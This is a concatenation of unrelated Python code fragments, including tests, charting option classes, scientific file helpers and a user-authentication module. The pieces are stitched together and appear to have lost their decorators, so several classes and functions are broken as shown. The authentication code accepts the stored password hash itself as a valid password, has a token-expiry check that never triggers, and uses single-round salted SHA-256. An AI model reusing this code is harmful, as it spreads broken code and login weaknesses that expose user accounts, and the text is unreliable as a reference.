if (predecessor in self._graph_slice):
self._graph_slice.add_edge(self._t_cfg.get_edge(predecessor, node).copy())
def _construct_reverse_graph_for(self, subgraph_nodes: Iterator[TransitionBlock]) -> TransitionCFG:
reverse_graph = TransitionCFG()
reverse_graph.add_nodes_from([node for node in subgraph_nodes])
for node in reverse_graph:
for successor in self._t_cfg.get_successors(node):
if (successor in reverse_graph):
reverse_graph.add_edge(TransitionEdge(successor, node, self._t_cfg.condition_handler.get_true_value()))
return reverse_graph
def _add_virtual_sink_node(self, virtual_node: TransitionBlock, sink_nodes: List[TransitionBlock]) -> None:
for sink in sink_nodes:
self._t_cfg.add_edge(TransitionEdge(sink, virtual_node, self._t_cfg.condition_handler.get_true_value())) |
class SettingNamePrefixFilter(admin.SimpleListFilter):
title = _('Name Prefix')
parameter_name = 'name_prefix'
def lookups(self, request, model_admin):
sep = '_'
names = list(set(Setting.objects.all().values_list('name', flat=True)))
names_count = len(names)
names_parts = [name.split(sep) for name in names]
prefixes = {}
for name_parts in names_parts:
name_parts_steps = []
for name_part in name_parts:
name_parts_steps.append(name_part)
prefix = sep.join(name_parts_steps)
prefixes.setdefault(prefix, 0)
prefixes[prefix] += 1
prefixes = {key: value for (key, value) in prefixes.items() if ((value > 1) and (value < names_count))}
names = set(prefixes.keys())
for name in names:
for other_name in names:
if ((name != other_name) and name.startswith(other_name) and (prefixes.get(name) == prefixes.get(other_name))):
prefixes.pop(other_name, None)
names = sorted(prefixes.keys())
return [(name, f'{name} ({prefixes[name]})') for name in names]
def queryset(self, request, queryset):
prefix = self.value()
if prefix:
return queryset.filter(name__istartswith=prefix)
return queryset |
def test_compare(tmp_path, capsys):
__main__._parse_and_main([*helpers.setup_temp_env(tmp_path), 'compare', 'cpython-3.12.0a0-c20186c397-fc_linux-b2cf916db80e-pyperformance', 'cpython-3.10.4-9d38120e33-fc_linux-b2cf916db80e-pyperformance'], __file__)
expected_start = '\n| Benchmark | cpython-3.12.0a0-c20186c397-fc_linux-b2cf916db80e-pyperformance | cpython-3.10.4-9d38120e33-fc_linux-b2cf916db80e-pyperformance |\n '
expected_end = '\n| Geometric mean | (ref) | 1.31x slower |\n++++\n\nBenchmark hidden because not significant (1): pickle\nIgnored benchmarks (2) of cpython-3.10.4-9d38120e33-fc_linux-b2cf916db80e-pyperformance.json: genshi_text, genshi_xml\n '
captured = capsys.readouterr()
print(captured.out)
assert (expected_start.strip() in captured.out)
assert captured.out.strip().endswith(expected_end.strip()) |
def test_1():
clf1 = mord.OrdinalRidge(alpha=0.0)
clf1.fit(X, y)
clf2 = mord.LogisticAT(alpha=0.0)
clf2.fit(X, y)
clf3 = mord.LogisticSE(alpha=0.0)
clf3.fit(X, y)
pred3 = clf3.predict(X)
pred2 = clf2.predict(X)
assert (np.abs((pred2 - y)).mean() <= np.abs((pred3 - y)).mean())
X_sparse = sparse.csr_matrix(X)
clf4 = mord.LogisticAT(alpha=0.0)
clf4.fit(X_sparse, y)
pred4 = clf4.predict(X_sparse)
assert (metrics.mean_absolute_error(y, pred4) < 1.0) |
class OptionSeriesTreegraphDataEvents(Options):
def click(self):
return self._config_get(None)
def click(self, value: Any):
self._config(value, js_type=False)
def drag(self):
return self._config_get(None)
def drag(self, value: Any):
self._config(value, js_type=False)
def dragStart(self):
return self._config_get(None)
def dragStart(self, value: Any):
self._config(value, js_type=False)
def drop(self):
return self._config_get(None)
def drop(self, value: Any):
self._config(value, js_type=False)
def mouseOut(self):
return self._config_get(None)
def mouseOut(self, value: Any):
self._config(value, js_type=False)
def mouseOver(self):
return self._config_get(None)
def mouseOver(self, value: Any):
self._config(value, js_type=False)
def remove(self):
return self._config_get(None)
def remove(self, value: Any):
self._config(value, js_type=False)
def select(self):
return self._config_get(None)
def select(self, value: Any):
self._config(value, js_type=False)
def unselect(self):
return self._config_get(None)
def unselect(self, value: Any):
self._config(value, js_type=False)
def update(self):
return self._config_get(None)
def update(self, value: Any):
self._config(value, js_type=False) |
class AMIClientTest(unittest.TestCase):
client = None
event = None
def setUp(self):
self.client = ami.AMIClient(**connection)
def build_event(self, event='SomeEvent', **kwargs):
return ami.Event(event, kwargs)
def test_add_event_listener(self):
def event_listener(event, **kwargs):
self.event = event
self.client.add_event_listener(event_listener)
self.client.fire_recv_event(self.build_event())
self.assertIsNotNone(self.event)
self.client.remove_event_listener(event_listener)
self.assertEqual(len(self.client._event_listeners), 0)
self.event = None
listener = self.client.add_event_listener(event_listener, white_list='OtherEvent')
self.client.fire_recv_event(self.build_event())
self.assertIsNone(self.event)
self.client.remove_event_listener(listener)
self.assertEqual(len(self.client._event_listeners), 0)
self.client.add_event_listener(event_listener, white_list='SomeEvent')
self.client.fire_recv_event(self.build_event())
self.assertIsNotNone(self.event)
registry_event = None
varset_event = None
def test_add_custom_on_event(self):
def on_varset(event, **kwargs):
self.varset_event = event
def on_registry(event, **kwargs):
self.registry_event = event
self.client.add_event_listener(on_VarSet=on_varset, on_Registry=on_registry)
self.client.fire_recv_event(self.build_event('VarSet'))
self.assertIsNotNone(self.varset_event)
self.assertIsNone(self.registry_event)
self.client.fire_recv_event(self.build_event('Registry'))
self.assertIsNotNone(self.registry_event) |
def test_powerline_decoration(manager_nospawn, minimal_conf_noscreen):
config = minimal_conf_noscreen
config.screens = [libqtile.config.Screen(top=libqtile.bar.Bar([widget.Spacer(length=50, name='one', background='ff0000', decorations=[PowerLineDecoration(size=10, path='arrow_left')]), widget.Spacer(length=50, name='two', background='0000ff', decorations=[PowerLineDecoration(size=10, shift=5, path='arrow_right')]), widget.Spacer(length=50, name='three', background='00ffff', decorations=[PowerLineDecoration(size=10, path='rounded_left')]), widget.Spacer(length=50, name='four', background='ff00ff', decorations=[PowerLineDecoration(size=10, shift=5, path='rounded_right')]), widget.Spacer(length=50, name='five', background='ffffff', decorations=[PowerLineDecoration(size=10, path='zig_zag')])], 10))]
manager_nospawn.start(config)
manager_nospawn.c.bar['top'].eval('self.draw()')
assert (manager_nospawn.c.widget['one'].info()['length'] == 60)
assert (manager_nospawn.c.widget['two'].info()['length'] == 55)
(_, fg) = manager_nospawn.c.widget['one'].eval('self.decorations[0].fg')
(_, bg) = manager_nospawn.c.widget['one'].eval('self.decorations[0].bg')
assert (fg == 'ff0000')
assert (bg == '0000ff')
(_, fg) = manager_nospawn.c.widget['four'].eval('self.decorations[0].fg')
(_, bg) = manager_nospawn.c.widget['four'].eval('self.decorations[0].bg')
assert (fg == 'ffffff')
assert (bg == 'ff00ff') |
def test_calculate_fades():
fader = TrackFader(None, None, None)
calcs = [(0, 4, 0, 0, 10, 0, 0, 6, 10), (None, 4, 0, 0, 10, 0, 0, 6, 10), (4, 0, 0, 0, 10, 0, 4, 10, 10), (4, None, 0, 0, 10, 0, 4, 10, 10), (4, 4, 0, 0, 10, 0, 4, 6, 10), (0, 0, 0, 0, 10, 0, 0, 10, 10), (None, None, 0, 0, 10, 0, 0, 10, 10), (0, 4, 0, 0, 2, 0, 0, 0, 2), (4, 0, 0, 0, 2, 0, 2, 2, 2), (4, 4, 0, 0, 2, 0, 1, 1, 2), (4, 4, 1, 0, 10, 1, 5, 6, 10), (4, 4, 0, 9, 10, 0, 4, 5, 9), (2, 2, 1, 9, 10, 1, 3, 7, 9), (4, 4, 4, 8, 10, 4, 6, 6, 8), (2, 4, 4, 7, 10, 4, 5, 5, 7), (4, 2, 4, 7, 10, 4, 6, 6, 7)]
i = 0
for (fin, fout, start, stop, tlen, t0, t1, t2, t3) in calcs:
print(('%2d: Fade In: %s; Fade Out: %s; start: %s; stop: %s; Len: %s' % (i, fin, fout, start, stop, tlen)))
track = FakeTrack(start, stop, tlen)
assert (fader.calculate_fades(track, fin, fout) == (t0, t1, t2, t3))
i += 1 |
def output(title, collection, plotter):
print()
print((title[0].upper() + title[1:]))
print(('-' * len(title)))
print()
path = os.path
for p in collection:
print()
print(p)
print(('^' * len(p)))
image = ('_static/gallery/%s/%s.svg' % (title, p))
path = os.path.join(DOCS, image)
if (not os.path.exists(path)):
try:
os.makedirs(os.path.dirname(path))
except FileExistsError:
pass
try:
plotter(p, path)
except Exception:
print(path)
print(traceback.format_exc())
print()
print('.. image::', ('/' + image))
print(' :width: 600')
print() |
def test_set_container_security_context():
config = ''
r = helm_template(config)
c = r['statefulset'][name]['spec']['template']['spec']['containers'][0]
assert (c['securityContext']['capabilities']['drop'] == ['ALL'])
assert (c['securityContext']['runAsNonRoot'] == True)
assert (c['securityContext']['runAsUser'] == 1000)
config = '\n securityContext:\n runAsUser: 1001\n other: test\n'
r = helm_template(config)
c = r['statefulset'][name]['spec']['template']['spec']['containers'][0]
assert (c['securityContext']['capabilities']['drop'] == ['ALL'])
assert (c['securityContext']['runAsNonRoot'] == True)
assert (c['securityContext']['runAsUser'] == 1001)
assert (c['securityContext']['other'] == 'test') |
class PlaybackAdapter():
def __init__(self, player):
self.__player = player
self.__events = ('playback_track_start', 'playback_track_end', 'playback_player_end', 'playback_toggle_pause', 'playback_error')
for e in self.__events:
event.add_callback(getattr(self, ('on_%s' % e)), e, player)
if (player.current is not None):
self.on_playback_track_start('playback_track_start', player, player.current)
if player.is_paused():
self.on_playback_toggle_pause('playback_toggle_pause', player, player.current)
def destroy(self):
for e in self.__events:
event.remove_callback(getattr(self, ('on_%s' % e)), e, self.__player)
def on_playback_track_start(self, event, player, track):
pass
def on_playback_track_end(self, event, player, track):
pass
def on_playback_player_end(self, event, player, track):
pass
def on_playback_toggle_pause(self, event, player, track):
pass
def on_playback_error(self, event, player, message):
pass |
class OptionSeriesArearangeDataDatalabelsTextpath(Options):
def attributes(self):
return self._config_get(None)
def attributes(self, value: Any):
self._config(value, js_type=False)
def enabled(self):
return self._config_get(False)
def enabled(self, flag: bool):
self._config(flag, js_type=False) |
def iter_commits(until=None, headers=None):
page = 1
uri = f'{FALCON_REPOSITORY_API}/commits'
resp = requests.get(uri, headers=headers)
resp.raise_for_status()
while (commits := resp.json()):
for commit in commits:
if (until and commit['sha'].startswith(until)):
return
(yield commit)
page += 1
uri = f'{FALCON_REPOSITORY_API}/commits?page={page}'
resp = requests.get(uri, headers=headers)
resp.raise_for_status() |
class User():
__slots__ = ['uid', 'username', 'password', 'is_admin']
def __init__(self, uid, username, password, is_admin=False):
self.uid = uid
self.username = username
self.password = password
self.is_admin = is_admin
def __repr__(self):
template = 'User id={s.uid}: <{s.username}, is_admin={s.is_admin}>'
return template.format(s=self)
def __str__(self):
return self.__repr__()
class DoesNotExist(Exception):
pass
class UserAlreadyExists(Exception):
pass
class PasswordDoesNotMatch(Exception):
pass
class PasswordAlreadyUsed(Exception):
pass
class PasswordExpired(Exception):
pass
class InvalidToken(Exception):
pass
class TokenExpired(Exception):
pass
class Objects():
async def get_roles(cls):
storage_client = connect.get_storage_async()
result = (await storage_client.query_tbl('roles'))
return result['rows']
async def get_role_id_by_name(cls, name):
storage_client = connect.get_storage_async()
payload = PayloadBuilder().SELECT('id').WHERE(['name', '=', name]).payload()
result = (await storage_client.query_tbl_with_payload('roles', payload))
return result['rows']
async def create(cls, username, password, role_id, access_method='any', real_name='', description=''):
storage_client = connect.get_storage_async()
payload = PayloadBuilder().INSERT(uname=username, pwd=(cls.hash_password(password) if password else ''), access_method=access_method, role_id=role_id, real_name=real_name, description=description).payload()
try:
result = (await storage_client.insert_into_tbl('users', payload))
audit = AuditLogger(storage_client)
audit_details = json.loads(payload)
audit_details.pop('pwd', None)
audit_details['message'] = "'{}' username created for '{}' user.".format(username, real_name)
(await audit.information('USRAD', audit_details))
except StorageServerError as ex:
if ex.error['retryable']:
pass
raise ValueError(ERROR_MSG)
return result
async def delete(cls, user_id):
if (int(user_id) == 1):
raise ValueError('Super admin user can not be deleted')
storage_client = connect.get_storage_async()
try:
(await cls.delete_user_tokens(user_id))
payload = PayloadBuilder().SET(enabled='f').WHERE(['id', '=', user_id]).AND_WHERE(['enabled', '=', 't']).payload()
result = (await storage_client.update_tbl('users', payload))
audit = AuditLogger(storage_client)
(await audit.information('USRDL', {'user_id': user_id, 'message': 'User ID: <{}> has been disabled.'.format(user_id)}))
except StorageServerError as ex:
if ex.error['retryable']:
pass
raise ValueError(ERROR_MSG)
return result
async def update(cls, user_id, user_data):
if (not user_data):
return False
old_data = (await cls.get(uid=user_id))
new_kwargs = {}
old_kwargs = {}
if ('access_method' in user_data):
old_kwargs['access_method'] = old_data['access_method']
new_kwargs.update({'access_method': user_data['access_method']})
if ('real_name' in user_data):
old_kwargs['real_name'] = old_data['real_name']
new_kwargs.update({'real_name': user_data['real_name']})
if ('description' in user_data):
old_kwargs['description'] = old_data['description']
new_kwargs.update({'description': user_data['description']})
if ('role_id' in user_data):
old_kwargs['role_id'] = old_data['role_id']
new_kwargs.update({'role_id': user_data['role_id']})
storage_client = connect.get_storage_async()
hashed_pwd = None
pwd_history_list = []
if ('password' in user_data):
if len(user_data['password']):
hashed_pwd = cls.hash_password(user_data['password'])
current_datetime = datetime.now()
old_kwargs['pwd'] = '****'
new_kwargs.update({'pwd': hashed_pwd, 'pwd_last_changed': str(current_datetime)})
pwd_history_list = (await cls._get_password_history(storage_client, user_id, user_data))
try:
payload = PayloadBuilder().SET(**new_kwargs).WHERE(['id', '=', user_id]).AND_WHERE(['enabled', '=', 't']).payload()
result = (await storage_client.update_tbl('users', payload))
if result['rows_affected']:
if (('password' in user_data) or ('role_id' in user_data)):
(await cls.delete_user_tokens(user_id))
if ('password' in user_data):
(await cls._insert_pwd_history_with_oldest_pwd_deletion_if_count_exceeds(storage_client, user_id, hashed_pwd, pwd_history_list))
audit = AuditLogger(storage_client)
if ('pwd' in new_kwargs):
new_kwargs['pwd'] = 'Password has been updated.'
new_kwargs.pop('pwd_last_changed', None)
(await audit.information('USRCH', {'user_id': user_id, 'old_value': old_kwargs, 'new_value': new_kwargs, 'message': "'{}' user has been changed.".format(old_data['uname'])}))
return True
except StorageServerError as ex:
if ex.error['retryable']:
pass
raise ValueError(ERROR_MSG)
except Exception:
raise
async def is_user_exists(cls, uid, password):
payload = PayloadBuilder().SELECT('uname', 'pwd').WHERE(['id', '=', uid]).AND_WHERE(['enabled', '=', 't']).payload()
storage_client = connect.get_storage_async()
result = (await storage_client.query_tbl_with_payload('users', payload))
if (len(result['rows']) == 0):
return None
found_user = result['rows'][0]
is_valid_pwd = cls.check_password(found_user['pwd'], str(password))
return (uid if is_valid_pwd else None)
async def all(cls):
storage_client = connect.get_storage_async()
result = (await storage_client.query_tbl('users'))
return result['rows']
async def filter(cls, **kwargs):
user_id = kwargs['uid']
user_name = kwargs['username']
q = PayloadBuilder().SELECT('id', 'uname', 'role_id', 'access_method', 'real_name', 'description').WHERE(['enabled', '=', 't'])
if (user_id is not None):
q = q.AND_WHERE(['id', '=', user_id])
if (user_name is not None):
q = q.AND_WHERE(['uname', '=', user_name])
storage_client = connect.get_storage_async()
q_payload = PayloadBuilder(q.chain_payload()).payload()
result = (await storage_client.query_tbl_with_payload('users', q_payload))
return result['rows']
async def get(cls, uid=None, username=None):
users = (await cls.filter(uid=uid, username=username))
if (len(users) == 0):
msg = ''
if uid:
msg = 'User with id:<{}> does not exist'.format(uid)
if username:
msg = 'User with name:<{}> does not exist'.format(username)
if (uid and username):
msg = 'User with id:<{}> and name:<{}> does not exist'.format(uid, username)
raise User.DoesNotExist(msg)
return users[0]
async def refresh_token_expiry(cls, token):
storage_client = connect.get_storage_async()
exp = (datetime.now() + timedelta(seconds=JWT_EXP_DELTA_SECONDS))
payload = PayloadBuilder().SET(token_expiration=str(exp)).WHERE(['token', '=', token]).MODIFIER(['allowzero']).payload()
(await storage_client.update_tbl('user_logins', payload))
async def validate_token(cls, token):
storage_client = connect.get_storage_async()
payload = PayloadBuilder().SELECT('token_expiration').ALIAS('return', ('token_expiration', 'token_expiration')).FORMAT('return', ('token_expiration', 'YYYY-MM-DD HH24:MI:SS.MS')).WHERE(['token', '=', token]).payload()
result = (await storage_client.query_tbl_with_payload('user_logins', payload))
if (len(result['rows']) == 0):
raise User.InvalidToken('Token appears to be invalid')
r = result['rows'][0]
token_expiry = r['token_expiration']
curr_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')
fmt = '%Y-%m-%d %H:%M:%S.%f'
diff = (datetime.strptime(token_expiry, fmt) - datetime.strptime(curr_time, fmt))
if (diff.seconds < 0):
raise User.TokenExpired('The token has expired, login again')
user_payload = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM], options={'verify_exp': False})
return user_payload['uid']
async def login(cls, username, password, host):
storage_client = connect.get_storage_async()
cfg_mgr = ConfigurationManager(storage_client)
category_item = (await cfg_mgr.get_category_item('rest_api', 'passwordChange'))
age = int(category_item['value'])
payload = PayloadBuilder().SELECT('pwd', 'id', 'role_id', 'access_method', 'pwd_last_changed', 'real_name', 'description').WHERE(['uname', '=', username]).ALIAS('return', ('pwd_last_changed', 'pwd_last_changed')).FORMAT('return', ('pwd_last_changed', 'YYYY-MM-DD HH24:MI:SS.MS')).AND_WHERE(['enabled', '=', 't']).payload()
result = (await storage_client.query_tbl_with_payload('users', payload))
if (len(result['rows']) == 0):
raise User.DoesNotExist('User does not exist')
found_user = result['rows'][0]
t1 = datetime.now()
t2 = datetime.strptime(found_user['pwd_last_changed'], '%Y-%m-%d %H:%M:%S.%f')
delta = (t1 - t2)
if (age == 0):
pass
elif (age <= delta.days):
raise User.PasswordExpired(found_user['id'])
is_valid_pwd = cls.check_password(found_user['pwd'], str(password))
if (not is_valid_pwd):
if (found_user['pwd'] != str(password)):
raise User.PasswordDoesNotMatch('Username or Password do not match')
(uid, jwt_token, is_admin) = (await cls._get_new_token(storage_client, found_user, host))
return (uid, jwt_token, is_admin)
async def _get_new_token(cls, storage_client, found_user, host):
exp = (datetime.now() + timedelta(seconds=JWT_EXP_DELTA_SECONDS))
uid = found_user['id']
p = {'uid': uid, 'exp': exp}
jwt_token = jwt.encode(p, JWT_SECRET, JWT_ALGORITHM)
payload = PayloadBuilder().INSERT(user_id=p['uid'], token=jwt_token, token_expiration=str(exp), ip=host).payload()
try:
(await storage_client.insert_into_tbl('user_logins', payload))
except StorageServerError as ex:
if ex.error['retryable']:
pass
raise ValueError(ERROR_MSG)
if (int(found_user['role_id']) == 1):
return (uid, jwt_token, True)
return (uid, jwt_token, False)
async def certificate_login(cls, username, host):
storage_client = connect.get_storage_async()
payload = PayloadBuilder().SELECT('id', 'role_id').WHERE(['uname', '=', username]).AND_WHERE(['enabled', '=', 't']).payload()
result = (await storage_client.query_tbl_with_payload('users', payload))
if (len(result['rows']) == 0):
raise User.DoesNotExist('User does not exist')
found_user = result['rows'][0]
(uid, jwt_token, is_admin) = (await cls._get_new_token(storage_client, found_user, host))
return (uid, jwt_token, is_admin)
async def delete_user_tokens(cls, user_id):
storage_client = connect.get_storage_async()
payload = PayloadBuilder().WHERE(['user_id', '=', user_id]).payload()
try:
res = (await storage_client.delete_from_tbl('user_logins', payload))
except StorageServerError as ex:
if (not ex.error['retryable']):
pass
raise ValueError(ERROR_MSG)
return res
async def delete_token(cls, token):
storage_client = connect.get_storage_async()
payload = PayloadBuilder().WHERE(['token', '=', token]).payload()
try:
res = (await storage_client.delete_from_tbl('user_logins', payload))
except StorageServerError as ex:
if (not ex.error['retryable']):
pass
raise ValueError(ERROR_MSG)
return res
async def delete_all_user_tokens(cls):
storage_client = connect.get_storage_async()
(await storage_client.delete_from_tbl('user_logins'))
def hash_password(cls, password):
salt = uuid.uuid4().hex
return ((hashlib.sha256((salt.encode() + password.encode())).hexdigest() + ':') + salt)
def check_password(cls, hashed_password, user_password):
(password, salt) = hashed_password.split(':')
return (password == hashlib.sha256((salt.encode() + user_password.encode())).hexdigest())
async def _get_password_history(cls, storage_client, user_id, user_data):
pwd_history_list = []
payload = PayloadBuilder().WHERE(['user_id', '=', user_id]).payload()
result = (await storage_client.query_tbl_with_payload('user_pwd_history', payload))
for row in result['rows']:
if cls.check_password(row['pwd'], user_data['password']):
raise User.PasswordAlreadyUsed
pwd_history_list.append(row['pwd'])
return pwd_history_list
async def _insert_pwd_history_with_oldest_pwd_deletion_if_count_exceeds(cls, storage_client, user_id, hashed_pwd, pwd_history_list):
if (len(pwd_history_list) >= USED_PASSWORD_HISTORY_COUNT):
payload = PayloadBuilder().WHERE(['user_id', '=', user_id]).AND_WHERE(['pwd', '=', pwd_history_list[(- 1)]]).payload()
(await storage_client.delete_from_tbl('user_pwd_history', payload))
payload = PayloadBuilder().INSERT(user_id=user_id, pwd=hashed_pwd).payload()
(await storage_client.insert_into_tbl('user_pwd_history', payload))
async def verify_certificate(cls, cert):
certs_dir = ((_FLEDGE_DATA + '/etc/certs') if _FLEDGE_DATA else (_FLEDGE_ROOT + '/data/etc/certs'))
storage_client = connect.get_storage_async()
cfg_mgr = ConfigurationManager(storage_client)
ca_cert_item = (await cfg_mgr.get_category_item('rest_api', 'authCertificateName'))
ca_cert_file = '{}/{}.cert'.format(certs_dir, ca_cert_item['value'])
SSLVerifier.set_ca_cert(ca_cert_file)
SSLVerifier.set_user_cert(cert)
SSLVerifier.verify() |
class Test_ofctl_v1_3(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_to_actions_pop_mpls(self):
dp = ofproto_protocol.ProtocolDesc(version=ofproto_v1_3.OFP_VERSION)
acts = [{'type': 'POP_MPLS', 'ethertype': 2048}]
result = ofctl_v1_3.to_actions(dp, acts)
insts = result[0]
act = insts.actions[0]
ok_(isinstance(act, OFPActionPopMpls))
eq_(act.ethertype, 2048) |
class TestContract(BaseTestContract, FaucetMixIn):
COIN = COIN
GAS_LIMIT = GAS_LIMIT
PREFIX = PREFIX
def get_ledger(self):
return LedgerClient(NET_CONFIG)
def get_wallet(self):
wallet = LocalWallet.generate(prefix=PREFIX)
self.ask_funds(wallet, self.get_ledger(), )
return wallet |
def get_concatenated_alg(alg_filenames, models=None, sp_field=0, sp_delimiter='_', kill_thr=0.0, keep_species=None):
if (keep_species is None):
keep_species = set()
concat = SeqGroup()
concat.id2partition = {}
if (not models):
models = (['None'] * len(alg_filenames))
elif (len(models) != len(alg_filenames)):
raise ValueError('Different number of algs and model names was found!')
expected_total_length = 0
alg_objects = []
sp2alg = defaultdict(list)
for (algfile, matrix) in zip(alg_filenames, models):
alg = SeqGroup(algfile, 'fasta')
alg_objects.append(alg)
lenseq = None
browsed_species = set()
alg.sp2seq = {}
alg.matrix = matrix
for (i, seq) in alg.id2seq.items():
name = db.get_seq_name(alg.id2name[i])
taxid = get_species_code(name, splitter=sp_delimiter, field=sp_field)
if ((lenseq is not None) and (len(seq) != lenseq)):
raise Exception('Inconsistent alignment when concatenating: Unequal length')
elif (lenseq is None):
lenseq = len(seq)
alg.seqlength = len(seq)
expected_total_length += len(seq)
if (taxid in browsed_species):
raise Exception('Inconsistent alignment when concatenating: Repeated species')
browsed_species.add(taxid)
sp2alg[taxid].append(alg)
alg.sp2seq[taxid] = seq
valid_species = [sp for sp in sp2alg.keys() if ((sp in keep_species) or ((len(sp2alg[sp]) / float(len(alg_objects))) > kill_thr))]
log.info(('%d out of %d will be kept (missing factor threshold=%g, %d species forced to kept)' % (len(valid_species), len(sp2alg), kill_thr, len(keep_species))))
def sort_single_algs(alg1, alg2):
r = cmp(alg1.matrix, alg2.matrix)
if (r == 0):
return cmp(sorted(alg1.id2name.values()), sorted(alg2.id2name.values()))
else:
return r
sorted_algs = sorted(alg_objects, key=cmp_to_key(sort_single_algs))
concat_alg_lengths = [alg.seqlength for alg in sorted_algs]
model2win = {}
model2size = {}
for alg in sorted_algs:
model2size[alg.matrix] = (model2size.get(alg.matrix, 0) + alg.seqlength)
concat.id2seq = defaultdict(list)
for sp in sorted(valid_species):
log.log(20, ('Concatenating sequences of [%s]' % sp))
for alg in sorted_algs:
seq = alg.sp2seq.get(sp, ('-' * alg.seqlength))
concat.id2seq[sp].append(seq)
concat.id2name[sp] = sp
concat.name2id[sp] = sp
concat.id2comment[sp] = ['']
concat.id2seq[sp] = ''.join(concat.id2seq[sp])
current_pos = 0
partitions = []
for model in sorted(model2size.keys()):
size = model2size[model]
part = ('%s, %s = %d-%d' % (model, (model + '_genes'), (current_pos + 1), (current_pos + size)))
current_pos += size
partitions.append(part)
seq_sizes = [len(seq) for seq in list(concat.id2seq.values())]
if (len(set(seq_sizes)) != 1):
raise Exception('Concatenated alignment is not consistent: unequal seq length ')
if (seq_sizes[0] != expected_total_length):
raise Exception('The size of concatenated alg is not what expected')
return (concat, partitions, sp2alg, valid_species, concat_alg_lengths) |
class ModelSerializer(ABC):
def __init__(self, feature_names: Sequence[str], target_type: Optional[str]=None, classification_labels: Optional[Sequence[str]]=None):
self._target_type = target_type
self._feature_names = feature_names
self._classification_labels = classification_labels
def to_dict(self) -> Dict[(str, Any)]:
d: Dict[(str, Any)] = {}
add_if_exists(d, 'target_type', self._target_type)
add_if_exists(d, 'feature_names', self._feature_names)
add_if_exists(d, 'classification_labels', self._classification_labels)
return d
def feature_names(self) -> Sequence[str]:
return self._feature_names
def serialize_model(self) -> Dict[(str, Any)]:
return {'trained_model': self.to_dict()}
def serialize_and_compress_model(self) -> str:
json_string = json.dumps(self.serialize_model(), separators=(',', ':'))
return base64.b64encode(gzip.compress(json_string.encode('utf-8'))).decode('ascii') |
def open(filename, mode='r', iline=189, xline=193, strict=True, ignore_geometry=False, endian='big'):
if ('w' in mode):
problem = 'w in mode would truncate the file'
solution = 'use r+ to open in read-write'
raise ValueError(', '.join((problem, solution)))
endians = {'little': 256, 'lsb': 256, 'big': 0, 'msb': 0}
if (endian not in endians):
problem = 'unknown endianness {}, expected one of: '
opts = ' '.join(endians.keys())
raise ValueError((problem.format(endian) + opts))
from . import _segyio
fd = _segyio.segyiofd(str(filename), mode, endians[endian])
fd.segyopen()
metrics = fd.metrics()
f = segyio.SegyFile(fd, filename=str(filename), mode=mode, iline=iline, xline=xline, endian=endian)
try:
delay_scalar = f.header[0][segyio.TraceField.ScalarTraceHeader]
if (delay_scalar == 0):
delay_scalar = 1
elif (delay_scalar < 0):
delay_scalar = (1.0 / delay_scalar)
dt = (segyio.tools.dt(f, fallback_dt=4000.0) / 1000.0)
t0 = (f.header[0][segyio.TraceField.DelayRecordingTime] * abs(delay_scalar))
samples = metrics['samplecount']
f._samples = ((numpy.arange(samples) * dt) + t0)
except:
f.close()
raise
if ignore_geometry:
return f
return infer_geometry(f, metrics, iline, xline, strict) |
class OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremolo(Options):
def depth(self) -> 'OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremoloDepth':
return self._config_sub_data('depth', OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremoloDepth)
def speed(self) -> 'OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremoloSpeed':
return self._config_sub_data('speed', OptionPlotoptionsGaugeSonificationDefaultinstrumentoptionsMappingTremoloSpeed) |
_identity
_basic_type_str
def abi_bytes_to_hex(abi_type: BasicType, type_str: TypeStr, data: Any) -> Optional[Tuple[(TypeStr, HexStr)]]:
if ((abi_type.base != 'bytes') or abi_type.is_array):
return None
bytes_data = hexstr_if_str(to_bytes, data)
if (abi_type.sub is None):
return (type_str, to_hex(bytes_data))
num_bytes = abi_type.sub
if (len(bytes_data) > num_bytes):
raise ValueError(f'This value was expected to be at most {num_bytes} bytes, but instead was {len(bytes_data)}: {data!r}')
padded = bytes_data.ljust(num_bytes, b'\x00')
return (type_str, to_hex(padded)) |
def calc_adaptation_matrices(w1: Tuple[(float, float)], w2: Tuple[(float, float)], m: Matrix) -> Tuple[(Matrix, Matrix)]:
first = alg.dot(m, util.xy_to_xyz(w1), dims=alg.D2_D1)
second = alg.dot(m, util.xy_to_xyz(w2), dims=alg.D2_D1)
m2 = alg.diag(alg.divide(first, second, dims=alg.D1))
adapt = cast(Matrix, alg.multi_dot([alg.inv(m), m2, m]))
return (adapt, alg.inv(adapt)) |
def test_state_manipulation():
state = State()
old_dict = state.full_dict = {'a': 1}
old_key = state.key = 'a'
new_dict = {'b': 2}
class MyValidator(Validator):
check_key = None
pre_validator = False
post_validator = False
__unpackargs__ = ('check_key',)
def to_python(self, value, state):
if (not self.pre_validator):
assert (getattr(state, 'full_dict', {}) == new_dict), 'full_dict not added'
assert (state.key == self.check_key), 'key not updated'
return value
def from_python(self, value, state):
if (not self.post_validator):
assert (getattr(state, 'full_dict', {}) == new_dict), 'full_dict not added'
assert (state.key == self.check_key), 'key not updated'
return value
s = Schema(if_key_missing=None, b=MyValidator('b'), c=MyValidator('c'), pre_validators=[MyValidator('a', pre_validator=True)], chained_validators=[MyValidator('a', post_validator=True)])
s.to_python(new_dict, state)
assert (state.full_dict == old_dict), 'full_dict not restored'
assert (state.key == old_key), 'key not restored'
s.from_python(new_dict, state)
assert (state.full_dict == old_dict), 'full_dict not restored'
assert (state.key == old_key), 'key not restored' |
def filter_extension_controller_dataplan_data(json):
option_list = ['apn', 'auth_type', 'billing_date', 'capacity', 'carrier', 'iccid', 'modem_id', 'monthly_fee', 'name', 'overage', 'password', 'pdn', 'preferred_subnet', 'private_network', 'signal_period', 'signal_threshold', 'slot', 'type', 'username']
json = remove_invalid_fields(json)
dictionary = {}
for attribute in option_list:
if ((attribute in json) and (json[attribute] is not None)):
dictionary[attribute] = json[attribute]
return dictionary |
class TrackDB():
def __init__(self, name: str='', location: str='', pickle_attrs: List[str]=[], loadfirst: bool=False):
if (loadfirst and (Track._get_track_count() != 0)):
raise RuntimeError((('Internal error! %d tracks already loaded, ' + 'TrackDB must be loaded first!') % Track._get_track_count()))
self.name = name
self.location = location
self._dirty = False
self.tracks: Dict[(str, TrackHolder)] = {}
self.pickle_attrs = pickle_attrs
